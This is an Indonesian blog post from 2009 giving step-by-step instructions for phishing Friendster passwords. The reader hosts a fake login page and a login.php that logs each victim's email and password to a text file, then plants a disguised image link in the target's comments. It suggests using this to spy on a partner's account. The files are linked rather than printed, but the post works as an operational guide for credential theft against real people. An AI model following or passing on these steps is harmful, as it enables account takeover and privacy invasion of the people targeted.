Minggu, 19 Juli 2009

Cara Ampuh Mendapatkan Password Friendster

Kali ini gue punya trik baru lagi bos namanya Phising setelah beberapa kali dicoba akhirnya berhasil gue mendapatkan beberapa password friendster sebenarnya cara ini bisa digunakan untuk hal lain yang lebih bermanfaat tapi kali ini kita coba di friendster dulu donk!! Dengan cara ini kita bisa mendapatkan password seseorang yang kita jadikan target misalnya loe pengen tau password fs pacar loe siapa tau aja passwordnya tuh nama pacar dia yang lain :( ya udah deh tanpa banyak basa basi langsung aja loe pelajari!!


SEBELUMYA!!!!!!ATTENTION PLEASE!!!!!!
1. Anda harus daftar dulu di web hosting pilihan anda(gw saranin sih yang gratis+bisa upload yang gede,,,LIke: ripway.com)
2.anda harus mempelajari terlebih dahulu script dibawah ini,,n SABARRRR,,,
3. HArus DIGUNAKAN SEBAGAIMANA MESTINYA yehh,,,,,
4. Ini peraturan yang paling penting nih jangan dipraktekin ke fs gue :)

Source code Fake login + login.php

Fake login
My link : http://h1.ripway.com/qalby/friendster/friendster.html

Bisa di download di sini


Yang perlu anda lakukan :
-copy paste code ini ke notepad dan save as pilih all files lalu dengan nama friendster.html
-Modifikasi code ini yang terletak pada http://h1.ripway.com/qalby/Friendster/login.php ( tekan CTRL + F untuk mempermudah pencarian )

Ganti halaman http://h1.ripway.com/qalby/Friendster/login.php , tersebut sesuai punya anda.

ke2 login.php
My link : http://h1.ripway.com/qalby/Friendster/login.php

Bisa di download di sini

Yang perlu anda lakukan :
-copy paste dan save as pilih all files lalu simpan dengan nama login.php
URL login.php inilah yang nanti diletakkan pada modifikasi code pada fake login .

Ke3 file kosong
My Link : http://h1.ripway.com/qalby/friendster/log.txt
Yang perlu anda lakukan :
-siapkan 1 file kosong,save dengan nama log.txt

Logika pada fake login(menurut saya ... )seperti ini:
URL Fake login(Halaman palsu) -> login.php (mengirimkan data korban ke log.txt ) -> log.txt (berisikan email +pass korban,silakan anda lihat di web anda )


Tips:
- Web hosting, gratisan jua gpp
- Akan lebih baik,bila disiapkan 1 folder tuk meletakkan ke3 file tsb.Agar lebih mudah dlm memodifikasi.





setelah itu masukkan code yg bisa di liat disini ke testi korban


KEDALAM COMMENTS SASARAN ANDA,,, tapi ubah dulu http://alamathostinganloe.com/ ubah dengan alamat hostingan friendster.html untuk mengubah gambar tipuannya http://i237.photobucket.com/albums/ff296/210793/naruto_001.jpg ama http://i237.photobucket.com/albums/ff296/210793/Order_of_the_Phoenix.jpg ,,silahkan anda rubah sesuai kemauan anda sendiri trik ini juga dapat digunakan berkali-kali,,trimakasih

Comments :

0 komentar to “Cara Ampuh Mendapatkan Password Friendster”

Poskan Komentar

Blog Archive

 

Copyright © 2009 by ¤ëXcêL™¤ ßlõg